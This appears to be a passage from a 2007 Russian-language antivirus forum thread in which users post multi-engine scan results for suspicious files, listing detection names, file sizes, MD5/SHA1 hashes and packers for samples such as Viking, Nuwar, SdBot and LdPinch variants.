Sophos 4.19.0 2007.07.06 no virus found
Sunbelt 2.2.907.0 2007.07.12 no virus found
Symantec 10 2007.07.13 no virus found
TheHacker 6.1.6.145 2007.07.12 no virus found
VBA32 3.12.0.2 2007.07.12 no virus found
VirusBuster 4.3.23:9 2007.07.12 no virus found
Webwasher-Gateway 6.0.1 2007.07.13 no virus found
Aditional information
File size: 120617 bytes
MD5: 97608ec010006982c8947ece097f8445
SHA1: d46fe590e5d8b03abefd2281ad839bc5dfac6baa[/QUOTE]
[size="1"][color="#666686"][B]Добавлено через 2 часа 3 минуты[/B][/color][/size]
Ещё одна новинка :)
детектит только Касперский
[B]2kadiras.exe[/B]
[QUOTE]AhnLab-V3 2007.7.13.0 2007.07.12 no virus found
AntiVir 7.4.0.39 2007.07.12 no virus found
Authentium 4.93.8 2007.07.12 no virus found
Avast 4.7.997.0 2007.07.12 no virus found
AVG 7.5.0.476 2007.07.12 no virus found
BitDefender 7.2 2007.07.13 no virus found
CAT-QuickHeal 9.00 2007.07.12 no virus found
ClamAV devel-20070416 2007.07.13 no virus found
DrWeb 4.33 2007.07.12 no virus found
eSafe 7.0.15.0 2007.07.10 no virus found
eTrust-Vet 30.8.3782 2007.07.12 no virus found
Ewido 4.0 2007.07.12 no virus found
FileAdvisor 1 2007.07.13 no virus found
Fortinet 2.91.0.0 2007.07.12 no virus found
F-Prot 4.3.2.48 2007.07.11 no virus found
Ikarus T3.1.1.8 2007.07.12 no virus found
[COLOR="Blue"]Kaspersky 4.0.2.24 2007.07.13 not-a-virus:Porn-Dialer.Win32.Agent.bb[/COLOR]
McAfee 5073 2007.07.12 no virus found
Microsoft 1.2704 2007.07.12 no virus found
NOD32v2 2396 2007.07.12 no virus found
Norman 5.80.02 2007.07.12 no virus found
Panda 9.0.0.4 2007.07.12 no virus found
Sophos 4.19.0 2007.07.06 no virus found
Sunbelt 2.2.907.0 2007.07.12 no virus found
Symantec 10 2007.07.13 no virus found
TheHacker 6.1.6.145 2007.07.12 no virus found
VBA32 3.12.0.2 2007.07.13 no virus found
VirusBuster 4.3.23:9 2007.07.12 no virus found
Webwasher-Gateway 6.0.1 2007.07.13 no virus found
Aditional information
File size: 25104 bytes
MD5: 9a1e16d1f5cabe8c0f93f1b759e82955
SHA1: bfab242afe999102524f16fd2d22aa7970f7d01e[/QUOTE]
-
T=11011
File avz00002.dta received on 07.13.2007 12:03:41 (CET)
Antivirus Version Last Update Result
AhnLab-V3 2007.7.13.0 2007.07.13 no virus found
[B]AntiVir 7.4.0.39 2007.07.13 HEUR/Malware[/B]
Authentium 4.93.8 2007.07.13 no virus found
Avast 4.7.997.0 2007.07.12 no virus found
AVG 7.5.0.476 2007.07.12 no virus found
BitDefender 7.2 2007.07.13 no virus found
CAT-QuickHeal 9.00 2007.07.12 no virus found
ClamAV devel-20070416 2007.07.13 no virus found
DrWeb 4.33 2007.07.13 no virus found
eSafe 7.0.15.0 2007.07.10 no virus found
eTrust-Vet 30.8.3783 2007.07.13 no virus found
Ewido 4.0 2007.07.12 no virus found
FileAdvisor 1 2007.07.13 no virus found
Fortinet 2.91.0.0 2007.07.13 no virus found
F-Prot 4.3.2.48 2007.07.13 no virus found
Ikarus T3.1.1.8 2007.07.13 no virus found
[B]Kaspersky 4.0.2.24 2007.07.13 not-a-virus:AdWare.Win32.Zhongsou.g[/B]
McAfee 5073 2007.07.12 no virus found
Microsoft 1.2704 2007.07.12 no virus found
NOD32v2 2396 2007.07.12 no virus found
Norman 5.80.02 2007.07.12 no virus found
Panda 9.0.0.4 2007.07.12 no virus found
Sophos 4.19.0 2007.07.06 no virus found
Sunbelt 2.2.907.0 2007.07.12 no virus found
[B]Symantec 10 2007.07.13 Trojan Horse[/B]
TheHacker 6.1.6.145 2007.07.12 no virus found
VBA32 3.12.0.2 2007.07.13 no virus found
VirusBuster 4.3.23:9 2007.07.12 no virus found
[B]Webwasher-Gateway 6.0.1 2007.07.13 Heuristic.Malware[/B]
Aditional information
File size: 135168 bytes
MD5: 7abca86780155b0eb52cfd67e3d7ff27
SHA1: 600ccdf95cf9775050419b95ac27c7ea4b77cb3a
-
[B]Maxim[/B], это вы правильно сделали, что вернулись с граики к тескту!
AhnLab-V3 2007.7.13.0 2007.07.13 no virus found
[B]AntiVir 7.4.0.39 2007.07.13 TR/Dldr.SVloader[/B]
Authentium 4.93.8 2007.07.13 could be a corrupted executable file
Avast 4.7.997.0 2007.07.12 no virus found
AVG 7.5.0.476 2007.07.12 no virus found
BitDefender 7.2 2007.07.13 no virus found
[B]CAT-QuickHeal 9.00 2007.07.12 (Suspicious) - DNAScan[/B]
ClamAV devel-20070416 2007.07.13 no virus found
DrWeb 4.33 2007.07.13 no virus found
[B]eSafe 7.0.15.0 2007.07.10 Suspicious Trojan/Worm[/B]
eTrust-Vet 30.8.3783 2007.07.13 no virus found
Ewido 4.0 2007.07.13 no virus found
FileAdvisor 1 2007.07.13 no virus found
[B]Fortinet 2.91.0.0 2007.07.13 W32/Nurech.AZ!tr.dldr[/B]
F-Prot 4.3.2.48 2007.07.13 no virus found
Ikarus T3.1.1.8 2007.07.13 no virus found
Kaspersky 4.0.2.24 2007.07.13 no virus found
McAfee 5073 2007.07.12 no virus found
Microsoft 1.2704 2007.07.12 no virus found
NOD32v2 2396 2007.07.12 no virus found
[B]Norman 5.80.02 2007.07.12 W32/Suspicious_U.gen[/B]
[I][B]Panda 9.0.0.4 2007.07.12 Suspicious file[/B][/I]
[B]Sophos 4.19.0 2007.07.06 Mal/Packer[/B]
Sunbelt 2.2.907.0 2007.07.12 no virus found
Symantec 10 2007.07.13 no virus found
TheHacker 6.1.6.145 2007.07.12 no virus found
VBA32 3.12.0.2 2007.07.13 no virus found
VirusBuster 4.3.23:9 2007.07.12
[B]Webwasher-Gateway 6.0.1 2007.07.13 Trojan.Dldr.SVloader [/B]
Aditional information
File size: 1047 bytes
MD5: 593727de2fd3e994f1c5ccd9fd9af926
SHA1: 4524e44c0b45e7b9e1591a3f938254caa7dfb02d
packers: UPACK
AhnLab-V3 2007.7.13.0 2007.07.13 no virus found
AntiVir 7.4.0.39 2007.07.13 no virus found
[B]Authentium 4.93.8 2007.07.13 W32/Downloader2.AHRD [/B]
Avast 4.7.997.0 2007.07.12 no virus found
[B]AVG 7.5.0.476 2007.07.12 Downloader.Generic4.TSR [/B]
[B]BitDefender 7.2 2007.07.13 Trojan.Peed.Gen [/B]
CAT-QuickHeal 9.00 2007.07.12 no virus found
[B]ClamAV devel-20070416 2007.07.13 Trojan.Downloader-9011[/B]
DrWeb 4.33 2007.07.13 no virus found
[B]eSafe 7.0.15.0 2007.07.10 Suspicious Trojan/Worm[/B]
eTrust-Vet 30.8.3783 2007.07.13 no virus found
Ewido 4.0 2007.07.13 no virus found
FileAdvisor 1 2007.07.13 no virus found
Fortinet 2.91.0.0 2007.07.13 no virus found
[B]F-Prot 4.3.2.48 2007.07.13 W32/Downloader2.AHRD[/B]
Ikarus T3.1.1.8 2007.07.13 no virus found
Kaspersky 4.0.2.24 2007.07.13 no virus found
McAfee 5073 2007.07.12 no virus found
Microsoft 1.2704 2007.07.12 no virus found
NOD32v2 2396 2007.07.12 no virus found
Norman 5.80.02 2007.07.12 no virus found
[B][I]Panda 9.0.0.4 2007.07.12 Suspicious file[/I][/B]
[B]Sophos 4.19.0 2007.07.06 Troj/Dloadr-BAM[/B]
Sunbelt 2.2.907.0 2007.07.12 no virus found
Symantec 10 2007.07.13 no virus found
TheHacker 6.1.6.145 2007.07.12 no virus found
VBA32 3.12.0.2 2007.07.13 no virus found
VirusBuster 4.3.23:9 2007.07.12 no virus found
[B]Webwasher-Gateway 6.0.1 2007.07.13 Win32.Malware.gen!92 (suspicious) [/B]
Aditional information
File size: 25774 bytes
MD5: 596f7c514408bca81abf7c9eb2d19fee
SHA1: c62ec8e766a02e5d0501ab2caf8bee5fee6059ee
-
File avz00001.dta received on 07.13.2007 12:16:01 (CET)
Current status: finished
Print results Antivirus Version Last Update Result
[B]AhnLab-V3 2007.7.13.0 2007.07.13 Win32/Viking.D
AntiVir 7.4.0.39 2007.07.13 W32/Viking.Q
Authentium 4.93.8 2007.07.13 W32/Viking.2!Generic
Avast 4.7.997.0 2007.07.12 Win32:Viking-P-UPK
AVG 7.5.0.476 2007.07.12 Worm/Generic.RP
BitDefender 7.2 2007.07.13 Win32.Worm.Viking.E
CAT-QuickHeal 9.00 2007.07.12 W32.Viking.n
ClamAV devel-20070416 2007.07.13 W32.Philis.W
DrWeb 4.33 2007.07.13 Win32.HLLW.Viking.4
eSafe 7.0.15.0 2007.07.10 suspicious Trojan/Worm
eTrust-Vet 30.8.3783 2007.07.13 Win32/Looked.AG
Ewido 4.0 2007.07.12 Worm.Viking.n
[/B]FileAdvisor 1 2007.07.13 no virus found
[B]Fortinet 2.91.0.0 2007.07.13 W32/Viking.N
[/B]F-Prot 4.3.2.48 2007.07.13 no virus found
[B]Ikarus T3.1.1.8 2007.07.13 Worm.Win32.Viking.n
Kaspersky 4.0.2.24 2007.07.13 Worm.Win32.Viking.n
McAfee 5073 2007.07.12 W32/HLLP.Philis.ap
Microsoft 1.2704 2007.07.12 Virus:Win32/Viking.G
NOD32v2 2396 2007.07.12 Win32/Viking.N
Norman 5.80.02 2007.07.12 W32/Looked.A
Panda 9.0.0.4 2007.07.12 W32/Viking.I.worm
Sophos 4.19.0 2007.07.06 W32/Looked-B
Sunbelt 2.2.907.0 2007.07.12 VIPRE.Suspicious
Symantec 10 2007.07.13 W32.Looked.P
TheHacker 6.1.6.145 2007.07.12 W32/Philis.gen
VBA32 3.12.0.2 2007.07.13 MalwareScope.Worm.Viking.4
VirusBuster 4.3.23:9 2007.07.12 Worm.Viking.V
Webwasher-Gateway 6.0.1 2007.07.13 Win32.Viking.Q
[/B]Aditional information
File size: 30105 bytes
MD5: b04018780c99ea77915e710bbbf19684
SHA1: 89a1d3401fd33426d88ad6fa4fb1e847f0c9b6aa
packers: UPack
-
File ecard.exe received on 07.13.2007 22:26:09 (CET)
[QUOTE]AhnLab-V3 2007.7.14.0 2007.07.13 no virus found
[B]AntiVir 7.4.0.39 2007.07.13 TR/Small.DBY.DB[/B]
Authentium 4.93.8 2007.07.13 no virus found
[B]Avast 4.7.997.0 2007.07.13 Win32:Tibs-BBA
AVG 7.5.0.476 2007.07.13 Downloader.Tibs.6.T
BitDefender 7.2 2007.07.13 Trojan.Peed.OQ
CAT-QuickHeal 9.00 2007.07.13 Trojan.Tibs.ab[/B]
ClamAV devel-20070416 2007.07.13 no virus found
[B]DrWeb 4.33 2007.07.13 Trojan.Packed.142
eSafe 7.0.15.0 2007.07.10 Suspicious Trojan/Worm
eTrust-Vet 30.8.3783 2007.07.13 Win32/Sintun[/B]
Ewido 4.0 2007.07.13 no virus found
FileAdvisor 1 2007.07.13 no virus found
[B]Fortinet 2.91.0.0 2007.07.13 W32/Tibs.AB!tr[/B]
F-Prot 4.3.2.48 2007.07.13 no virus found
[B]Ikarus T3.1.1.8 2007.07.13 Packed.Win32.Tibs.ab
Kaspersky 4.0.2.24 2007.07.13 Packed.Win32.Tibs.ab
McAfee 5074 2007.07.13 W32/Nuwar@MM
Microsoft 1.2704 2007.07.12 Worm:Win32/Nuwar.JT.dr[/B]
NOD32v2 2397 2007.07.13 no virus found
Norman 5.80.02 2007.07.13 no virus found
[B]Panda 9.0.0.4 2007.07.13 Suspicious file
Sophos 4.19.0 2007.07.06 Mal/Dorf-A[/B]
Sunbelt 2.2.907.0 2007.07.12 no virus found
[B]Symantec 10 2007.07.13 Trojan.Packed.13[/B]
TheHacker 6.1.6.146 2007.07.13 no virus found
VBA32 3.12.0.2 2007.07.13 no virus found
[B]VirusBuster 4.3.23:9 2007.07.13 Trojan.Tibs.Gen!Pac.126
Webwasher-Gateway 6.0.1 2007.07.13 Trojan.Small.DBY.DB[/B][/QUOTE]
[size="1"][color="#666686"][B]Добавлено через 17 часов 51 минуту[/B][/color][/size]
File cent.exe received on 07.14.2007 16:16:10 (CET)
[QUOTE]AhnLab-V3 2007.7.14.0 2007.07.14 no virus found
[B]AntiVir 7.4.0.39 2007.07.13 TR/Crypt.XPACK.Gen[/B]
Authentium 4.93.8 2007.07.13 no virus found
Avast 4.7.997.0 2007.07.13 no virus found
AVG 7.5.0.476 2007.07.13 no virus found
[B]BitDefender 7.2 2007.07.14 MemScan:Trojan.PWS.LdPinch.BSJ
CAT-QuickHeal 9.00 2007.07.14 (Suspicious) - DNAScan[/B]
ClamAV devel-20070416 2007.07.14 no virus found
DrWeb 4.33 2007.07.14 no virus found
[B]eSafe 7.0.15.0 2007.07.10 Suspicious Trojan/Worm[/B]
eTrust-Vet 30.8.3784 2007.07.14 no virus found
Ewido 4.0 2007.07.14 no virus found
FileAdvisor 1 2007.07.14 no virus found
Fortinet 2.91.0.0 2007.07.14 no virus found
F-Prot 4.3.2.48 2007.07.13 no virus found
Ikarus T3.1.1.8 2007.07.14 no virus found
[B]Kaspersky 4.0.2.24 2007.07.14 Trojan-PSW.Win32.LdPinch.bjx[/B]
McAfee 5074 2007.07.13 no virus found
[B]Microsoft 1.2704 2007.07.14 Trojan:Win32/Anomaly.gen!A[/B]
NOD32v2 2399 2007.07.14 no virus found
Norman 5.80.02 2007.07.13 no virus found
Panda 9.0.0.4 2007.07.14 no virus found
[B]Sophos 4.19.0 2007.07.06 Mal/Basine-C[/B]
Sunbelt 2.2.907.0 2007.07.14 no virus found
Symantec 10 2007.07.14 no virus found
TheHacker 6.1.6.146 2007.07.13 no virus found
VBA32 3.12.0.2 2007.07.13 no virus found
VirusBuster 4.3.23:9 2007.07.14 no virus found
[B]Webwasher-Gateway 6.0.1 2007.07.14 Trojan.Crypt.XPACK.Gen[/B][/QUOTE]
-
из темы [url]http://www.virusinfo.info/showthread.php?t=10929[/url]
файл [B]xccjmmuu.dll[/B]
[QUOTE]Antivirus Version Last Update Result
AhnLab-V3 2007.7.14.0 2007.07.16 no virus found
[B]AntiVir 7.4.0.42 2007.07.15 TR/PSW.Gamania.B[/B]
Authentium 4.93.8 2007.07.13 no virus found
Avast 4.7.997.0 2007.07.16 no virus found
AVG 7.5.0.476 2007.07.15 no virus found
[B]BitDefender 7.2 2007.07.16 Trojan.Vundo.CG[/B]
CAT-QuickHeal 9.00 2007.07.14 no virus found
ClamAV devel-20070416 2007.07.16 no virus found
[B]DrWeb 4.33 2007.07.15 Trojan.Virtumod[/B]
[B]eSafe 7.0.15.0 2007.07.10 Suspicious Trojan/Worm
eTrust-Vet 30.8.3784 2007.07.14 Win32/Vundo[/B]
Ewido 4.0 2007.07.14 no virus found
FileAdvisor 1 2007.07.16 no virus found
Fortinet 2.91.0.0 2007.07.16 no virus found
F-Prot 4.3.2.48 2007.07.13 no virus found
[B]Ikarus T3.1.1.8 2007.07.16 Trojan-PWS.Gamania.B[/B]
Kaspersky 4.0.2.24 2007.07.16 no virus found
McAfee 5074 2007.07.13 no virus found
Microsoft 1.2704 2007.07.16 no virus found
NOD32v2 2399 2007.07.14 no virus found
Norman 5.80.02 2007.07.13 no virus found
Panda 9.0.0.4 2007.07.15 Suspicious file
Sophos 4.19.0 2007.07.06 no virus found
[B]Sunbelt 2.2.907.0 2007.07.14 VIPRE.Suspicious[/B]
Symantec 10 2007.07.16 no virus found
TheHacker 6.1.6.146 2007.07.13 no virus found
VBA32 3.12.0.2 2007.07.16 no virus found
VirusBuster 4.3.23:9 2007.07.15 no virus found
Webwasher-Gateway 6.0.1 2007.07.16 Trojan.PSW.Gamania.B[/QUOTE]
файл - [B]vhpabgkn.dll[/B]
[QUOTE]Antivirus Version Last Update Result
AhnLab-V3 2007.7.14.0 2007.07.16 no virus found
AntiVir 7.4.0.42 2007.07.15 no virus found
Authentium 4.93.8 2007.07.13 no virus found
Avast 4.7.997.0 2007.07.16 no virus found
AVG 7.5.0.476 2007.07.15 no virus found
BitDefender 7.2 2007.07.16 no virus found
CAT-QuickHeal 9.00 2007.07.14 no virus found
ClamAV devel-20070416 2007.07.16 no virus found
[B]DrWeb 4.33 2007.07.16 Trojan.Virtumod[/B]
[B]eSafe 7.0.15.0 2007.07.10 Suspicious Trojan/Worm[/B]
eTrust-Vet 30.8.3784 2007.07.14 no virus found
Ewido 4.0 2007.07.14 no virus found
FileAdvisor 1 2007.07.16 no virus found
Fortinet 2.91.0.0 2007.07.16 no virus found
F-Prot 4.3.2.48 2007.07.13 no virus found
[B]Ikarus T3.1.1.8 2007.07.16 Win32.Rigel.6468[/B]
Kaspersky 4.0.2.24 2007.07.16 no virus found
McAfee 5074 2007.07.13 no virus found
Microsoft 1.2704 2007.07.16 no virus found
NOD32v2 2399 2007.07.14 no virus found
Norman 5.80.02 2007.07.13 no virus found
Panda 9.0.0.4 2007.07.15 Suspicious file
Sophos 4.19.0 2007.07.06 no virus found
[B]Sunbelt 2.2.907.0 2007.07.14 VIPRE.Suspicious[/B]
Symantec 10 2007.07.16 no virus found
TheHacker 6.1.6.146 2007.07.13 no virus found
VBA32 3.12.0.2 2007.07.16 no virus found
VirusBuster 4.3.23:9 2007.07.15 no virus found
[B]Webwasher-Gateway 6.0.1 2007.07.16 Virus.Win32.FileInfector.gen (suspicious)[/B][/QUOTE]
-
[B]T=11066[/B]
File mssrv32.exe received on 07.16.2007 09:46:22 (CET)
Antivirus Version Last Update Result
AhnLab-V3 2007.7.14.0 2007.07.16 no virus found
[B][B]AntiVir 7.4.0.42 2007.07.16 HEUR/Crypted[/B][/B]
Authentium 4.93.8 2007.07.13 no virus found
Avast 4.7.997.0 2007.07.16 no virus found
[B]AVG 7.5.0.476 2007.07.15 Generic5.LBD[/B]
[B]BitDefender 7.2 2007.07.16 Trojan.Agent.APV[/B]
[B]CAT-QuickHeal 9.00 2007.07.14 (Suspicious) - DNAScan[/B]
ClamAV devel-20070416 2007.07.16 no virus found
DrWeb 4.33 2007.07.16 no virus found
[B]eSafe 7.0.15.0 2007.07.10 Suspicious Trojan/Worm[/B]
eTrust-Vet 30.8.3787 2007.07.16 no virus found
[B]Ewido 4.0 2007.07.14 Trojan.Agent.apv[/B]
FileAdvisor 1 2007.07.16 no virus found
Fortinet 2.91.0.0 2007.07.16 no virus found
F-Prot 4.3.2.48 2007.07.13 no virus found
[B]Ikarus T3.1.1.8 2007.07.16 Trojan.Win32.Agent.apv[/B]
[B]Kaspersky 4.0.2.24 2007.07.16 Trojan.Win32.Agent.apv[/B]
McAfee 5074 2007.07.13 no virus found
Microsoft 1.2704 2007.07.16 no virus found
NOD32v2 2399 2007.07.14 no virus found
[B]Norman 5.80.02 2007.07.13 W32/Agent.BTGG[/B]
[B]Panda 9.0.0.4 2007.07.15 Trj/Downloader.MDW[/B]
Sophos 4.19.0 2007.07.16 no virus found
[B]Sunbelt 2.2.907.0 2007.07.14 Trojan.Win32.Agent.apv[/B]
Symantec 10 2007.07.16 no virus found
[B]TheHacker 6.1.6.146 2007.07.13 Trojan/Agent.apv
VBA32 3.12.0.2 2007.07.16 Trojan.Win32.Agent.apv[/B]
VirusBuster 4.3.23:9 2007.07.15 no virus found
[B]Webwasher-Gateway 6.0.1 2007.07.16 Heuristic.Crypted[/B]
Aditional information
File size: 12379 bytes
MD5: 329fcafb53b3bc5adbe3e915cc8253a5
SHA1: 030b56976b969672154a7bcb839b7e31e848750b
[B]
t=10929[/B]
[size="1"][color="#666686"][B]Добавлено через 46 минут[/B][/color][/size]
[code]
File ieqokuvj.dll received on 07.16.2007 10:23:16 (CET)
Antivirus Version Last Update Result
AhnLab-V3 2007.7.14.0 2007.07.16 no virus found
AntiVir 7.4.0.42 2007.07.16 no virus found
Authentium 4.93.8 2007.07.13 no virus found
Avast 4.7.997.0 2007.07.16 no virus found
AVG 7.5.0.476 2007.07.15 no virus found
BitDefender 7.2 2007.07.16 no virus found
CAT-QuickHeal 9.00 2007.07.14 no virus found
ClamAV devel-20070416 2007.07.16 no virus found
[B][B]DrWeb 4.33 2007.07.16 Trojan.Virtumod[/B]
eSafe 7.0.15.0 2007.07.10 Suspicious Trojan/Worm[/B]
eTrust-Vet 30.8.3787 2007.07.16 no virus found
Ewido 4.0 2007.07.14 no virus found
FileAdvisor 1 2007.07.16 no virus found
Fortinet 2.91.0.0 2007.07.16 no virus found
F-Prot 4.3.2.48 2007.07.13 no virus found
[B][B]Ikarus T3.1.1.8 2007.07.16 Win32.Rigel.6468[/B]
Kaspersky 4.0.2.24 2007.07.16 Trojan.Win32.BHO.bd[/B]
McAfee 5074 2007.07.13 no virus found
Microsoft 1.2704 2007.07.16 no virus found
NOD32v2 2399 2007.07.14 no virus found
Norman 5.80.02 2007.07.13 no virus found
[B]Panda 9.0.0.4 2007.07.15 Suspicious file[/B]
[B]Sophos 4.19.0 2007.07.16 Virtumundo[/B]
[B]Sunbelt 2.2.907.0 2007.07.14 VIPRE.Suspicious[/B]
Symantec 10 2007.07.16 no virus found
TheHacker 6.1.6.146 2007.07.13 no virus found
VBA32 3.12.0.2 2007.07.16 no virus found
VirusBuster 4.3.23:9 2007.07.15 no virus found
[B]Webwasher-Gateway 6.0.1 2007.07.16 Virus.Win32.FileInfector.gen (suspicious)[/B]
Aditional information
File size: 66624 bytes
MD5: f4f358cf6a6a3f0539622d1bcabc07a9
SHA1: 5f35399114f07afe429e1d710bcdb993806791de
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.[/code]
-
[B]mxrs.exe[/B] -вирёк ломится по портам 135 и 445
[url]http://virusinfo.info/showthread.php?t=11077[/url]
[QUOTE]Antivirus Version Last Update Result
AhnLab-V3 2007.7.14.0 2007.07.16 no virus found
[B]AntiVir 7.4.0.42 2007.07.16 HEUR/Crypted[/B]
[B]Authentium 4.93.8 2007.07.13 Possibly a new variant of W32/Backdoor-based
Avast 4.7.997.0 2007.07.16 Win32:SdBot-gen44[/B]
AVG 7.5.0.476 2007.07.15 no virus found
[B]BitDefender 7.2 2007.07.16 DeepScan:Generic.Sdbot.51BCF3A2
CAT-QuickHeal 9.00 2007.07.14 (Suspicious) - DNAScan[/B]
ClamAV devel-20070416 2007.07.16 no virus found
DrWeb 4.33 2007.07.16 no virus found
[B]eSafe 7.0.15.0 2007.07.10 Suspicious Trojan/Worm[/B]
eTrust-Vet 30.8.3787 2007.07.16 no virus found
Ewido 4.0 2007.07.14 no virus found
FileAdvisor 1 2007.07.16 no virus found
Fortinet 2.91.0.0 2007.07.16 no virus found
F-Prot 4.3.2.48 2007.07.13 no virus found
[B]Ikarus T3.1.1.8 2007.07.16 Generic.Sdbot[/B]
Kaspersky 4.0.2.24 2007.07.16 no virus found
McAfee 5074 2007.07.13 no virus found
Microsoft 1.2704 2007.07.16 no virus found
[B]NOD32v2 2399 2007.07.14 probably a variant of Win32/Genetik[/B]
[B]Norman 5.80.02 2007.07.13 W32/Malware.ABAT
Panda 9.0.0.4 2007.07.15 W32/Gaobot.PUP.worm[/B]
Sophos 4.19.0 2007.07.16 no virus found
[B]Sunbelt 2.2.907.0 2007.07.14 VIPRE.Suspicious
Symantec 10 2007.07.16 W32.Spybot.Worm[/B]
TheHacker 6.1.6.147 2007.07.16 no virus found
VBA32 3.12.0.2 2007.07.16 no virus found
VirusBuster 4.3.23:9 2007.07.15 no virus found
[B]Webwasher-Gateway 6.0.1 2007.07.16 Heuristic.Crypted[/B][/QUOTE]
-
Файлы из темы [url]http://virusinfo.info/showthread.php?t=11085[/url]
File avz00003.dta received on 07.16.2007 21:05:26 (CET)[QUOTE][B]AhnLab-V3 2007.7.14.0 2007.07.16 Win32/IRCBot.worm.variant
AntiVir 7.4.0.42 2007.07.16 TR/Crypt.PCMM.Gen
Authentium 4.93.8 2007.07.13 W32/Backdoor.AREZ
Avast 4.7.997.0 2007.07.16 Win32:SdBot-4541
AVG 7.5.0.476 2007.07.15 IRC/BackDoor.SdBot3.BCQ
BitDefender 7.2 2007.07.16 Backdoor.SDBot.DEOL
CAT-QuickHeal 9.00 2007.07.16 Backdoor.SdBot.bfl
ClamAV devel-20070416 2007.07.16 Trojan.SdBot-6493
DrWeb 4.33 2007.07.16 Win32.HLLW.MyBot
eSafe 7.0.15.0 2007.07.16 Win32.SdBot.bfl
eTrust-Vet 30.8.3787 2007.07.16 Win32/Rbot.GSI
Ewido 4.0 2007.07.14 Backdoor.SdBot.bfl
FileAdvisor 1 2007.07.16 Low threat detected
Fortinet 2.91.0.0 2007.07.16 W32/PCMM.AU!tr
F-Prot 4.3.2.48 2007.07.13 W32/Backdoor!4c8f
Ikarus T3.1.1.8 2007.07.16 Backdoor.Win32.SdBot.bfl
Kaspersky 4.0.2.24 2007.07.16 Backdoor.Win32.SdBot.bfl
McAfee 5075 2007.07.16 New Malware.ea
Microsoft 1.2704 2007.07.16 Trojan:Win32/Ircbrute!FE1D[/B]
NOD32v2 2400 2007.07.16 no virus found
[B]Norman 5.80.02 2007.07.16 W32/SDBot.AQKY
Panda 9.0.0.4 2007.07.16 W32/Sdbot.KLO.worm
Sophos 4.19.0 2007.07.16 Mal/Packer
Sunbelt 2.2.907.0 2007.07.14 Backdoor.Win32.SdBot.bfl[/B]
Symantec 10 2007.07.16 no virus found
[B]TheHacker 6.1.6.147 2007.07.16 Backdoor/SdBot.bfl
VBA32 3.12.0.2 2007.07.16 Backdoor.Win32.SdBot.bfl
VirusBuster 4.3.23:9 2007.07.16 Worm.SdBot.FOF
Webwasher-Gateway 6.0.1 2007.07.16 Trojan.Crypt.PCMM.Gen[/B][/QUOTE]
[QUOTE][B]AhnLab-V3 2007.7.14.0 2007.07.16 Win-Trojan/Slaper.70834
AntiVir 7.4.0.42 2007.07.16 Worm/IRCBot.aak
Authentium 4.93.8 2007.07.13 W32/Trojan.ASXG[/B]
Avast 4.7.997.0 2007.07.16 no virus found
[B]AVG 7.5.0.476 2007.07.16 Proxy.PAY
BitDefender 7.2 2007.07.16 Trojan.Proxy.Slaper.AA
CAT-QuickHeal 9.00 2007.07.16 TrojanProxy.Slaper.p
ClamAV devel-20070416 2007.07.16 Trojan.Proxy-920
DrWeb 4.33 2007.07.16 BackDoor.Mailbot
eSafe 7.0.15.0 2007.07.16 Win32.Slaper.p[/B]
eTrust-Vet 30.8.3787 2007.07.16 no virus found
[B]Ewido 4.0 2007.07.14 Proxy.Slaper.p[/B]
FileAdvisor 1 2007.07.16 no virus found
[B]Fortinet 2.91.0.0 2007.07.16 W32/Slaper.P!tr
F-Prot 4.3.2.48 2007.07.13 W32/Trojan.ASXG
Ikarus T3.1.1.8 2007.07.16 Trojan-Proxy.Win32.Slaper.p
Kaspersky 4.0.2.24 2007.07.16 Trojan-Proxy.Win32.Slaper.p
McAfee 5075 2007.07.16 New Malware.ea[/B]
Microsoft 1.2704 2007.07.16 no virus found
NOD32v2 2400 2007.07.16 no virus found
[B]Norman 5.80.02 2007.07.16 W32/Slaper.FK
Panda 9.0.0.4 2007.07.16 Suspicious file
Sophos 4.19.0 2007.07.16 Mal/Packer
Sunbelt 2.2.907.0 2007.07.14 VIPRE.Suspicious[/B]
Symantec 10 2007.07.16 no virus found
[B]TheHacker 6.1.6.147 2007.07.16 Trojan/Proxy.Slaper.p
VBA32 3.12.0.2 2007.07.16 Trojan-Proxy.Win32.Slaper.p[/B]
VirusBuster 4.3.23:9 2007.07.16 no virus found
[B]Webwasher-Gateway 6.0.1 2007.07.16 Worm.IRCBot.aak[/B][/QUOTE]
[QUOTE][B]AhnLab-V3 2007.7.14.0 2007.07.16 Win-Trojan/Slaper.73742
AntiVir 7.4.0.42 2007.07.16 Worm/IRCBot.aak
Authentium 4.93.8 2007.07.13 W32/Trojan.ARSS[/B]
Avast 4.7.997.0 2007.07.16 no virus found
[B]AVG 7.5.0.476 2007.07.16 Proxy.PAZ
BitDefender 7.2 2007.07.16 Trojan.Proxy.Slapper.B
CAT-QuickHeal 9.00 2007.07.16 (Suspicious) - DNAScan
ClamAV devel-20070416 2007.07.16 Trojan.Proxy-919[/B]
DrWeb 4.33 2007.07.16 no virus found
[B]eSafe 7.0.15.0 2007.07.16 Win32.Slaper.p[/B]
eTrust-Vet 30.8.3787 2007.07.16 no virus found
[B]Ewido 4.0 2007.07.16 Proxy.Slaper.p[/B]
FileAdvisor 1 2007.07.16 no virus found
[B]Fortinet 2.91.0.0 2007.07.16 W32/Slaper.P!tr
F-Prot 4.3.2.48 2007.07.13 W32/Trojan.ARSS
Ikarus T3.1.1.8 2007.07.16 Trojan-Proxy.Win32.Slaper.p
Kaspersky 4.0.2.24 2007.07.16 Trojan-Proxy.Win32.Slaper.p
McAfee 5075 2007.07.16 New Malware.ea[/B]
Microsoft 1.2704 2007.07.16 no virus found
NOD32v2 2400 2007.07.16 no virus found
[B]Norman 5.80.02 2007.07.16 W32/Slaper.FJ
Panda 9.0.0.4 2007.07.16 Generic Malware
Sophos 4.19.0 2007.07.16 Mal/Packer
Sunbelt 2.2.907.0 2007.07.14 Trojan-Proxy.Win32.Slaper.p[/B]
Symantec 10 2007.07.16 no virus found
[B]TheHacker 6.1.6.147 2007.07.16 Trojan/Proxy.Slaper.p
VBA32 3.12.0.2 2007.07.16 Trojan-Proxy.Win32.Slaper.p[/B]
VirusBuster 4.3.23:9 2007.07.16 no virus found
[B]Webwasher-Gateway 6.0.1 2007.07.16 Worm.IRCBot.aak[/B][/QUOTE]
-
из темы [url]http://virusinfo.info/showthread.php?t=11088[/url]
патченый [B]ntoskrnl.exe
[/B]
[QUOTE]AhnLab-V3 2007.7.14.0 2007.07.17 no virus found
AntiVir 7.4.0.42 2007.07.17 no virus found
Authentium 4.93.8 2007.07.18 no virus found
Avast 4.7.997.0 2007.07.17 no virus found
AVG 7.5.0.476 2007.07.17 no virus found
BitDefender 7.2 2007.07.17 no virus found
